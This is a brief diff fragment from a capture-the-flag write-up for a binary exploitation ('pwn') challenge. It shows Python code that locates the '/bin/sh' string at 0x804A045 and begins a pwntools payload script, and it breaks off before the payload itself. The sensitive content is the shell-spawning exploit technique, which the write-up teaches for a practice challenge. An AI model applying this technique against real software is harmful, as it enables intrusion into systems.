APenderGH/ctf_write-ups/misc/deluqs-qutwh-pwn-challenge/README.md

 p = next(challenge.search(b"/bin/sh"))
 print(p) # Prints 134520901, the decimal representation of 0x804A045
 ```
 Alright, the pointer to "/bin/sh" is `0x804A045`, now lets build our payload.
+We'll need to use pwntools here because we want to send these addresses as raw bytes, which isn't possible with just your keyboard.
+It also gives us a nice way to program this, making it consistent and repeatable.
+Here's what our script will look like,
 ```py
 from pwn import *